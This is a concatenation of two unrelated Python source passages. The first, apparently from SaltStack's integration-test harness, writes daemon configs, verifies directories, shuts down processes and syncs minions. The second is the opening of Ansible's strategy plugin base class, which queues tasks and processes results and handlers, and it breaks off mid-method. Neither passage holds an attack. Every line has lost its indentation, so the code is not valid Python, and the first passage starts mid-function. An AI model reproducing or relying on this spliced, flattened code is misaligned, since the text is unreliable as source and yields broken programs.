opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
"""
try:
if hasattr(self.sub_minion_process, "terminate"):
self.sub_minion_process.terminate()
else:
log.error("self.sub_minion_process can't be terminate.")
except AttributeError:
pass
try:
if hasattr(self.minion_process, "terminate"):
self.minion_process.terminate()
else:
log.error("self.minion_process can't be terminate.")
except AttributeError:
pass
if hasattr(self, "proxy_process"):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
log.error("self.master_process can't be terminate.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more second
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
                        # An error has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
__init__.py
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, string_types
from ansible.module_utils._text import to_text
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.manager import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
    A simple object to make passing the various plugin loaders to
    the forked processes over the queue easier
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
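# Background consumer thread: drain task results from the strategy's final queue into
# strategy._results (guarded by _results_lock) until the sentinel object is received,
# at which point the thread exits (see StrategyBase.cleanup()).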
def results_thread_main(strategy):
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
def cleanup(self):
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
        # return the appropriate code, depending on the status of the hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
(worker_prc, rslt_q) = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker][0] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
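        # Return True if target_handler, or any include/include_role ancestor of it,
        # has a (templated) name matching handler_name.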
def parent_handler_match(target_handler, handler_name):
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
found_task = iterator.get_original_task(original_host, task_result._task)
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# get the correct loop var for use later
if original_task.loop_control:
loop_var = original_task.loop_control.loop_var or 'item'
else:
loop_var = 'item'
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff:
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and state.run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
# FIXME: should this be a callback?
display.vv("NOTIFIED HANDLER %s" % (handler_name,))
else:
                                    # There may be more than one handler with the notified name as the
# parent, so we just keep track of whether or not we found one at all
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
display.vv("NOTIFIED HANDLER %s" % (target_handler.get_name(),))
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
self._notified_handlers[listening_handler._uuid].append(original_host)
display.vv("NOTIFIED HANDLER %s" % (listening_handler.get_name(),))
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list nor in the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
                                # find the host we're actually referring to here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('ansible_facts_cacheable', True)
for target_host in host_list:
if cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
# If we are setting a fact, it should populate non_persistent_facts as well
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff:
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
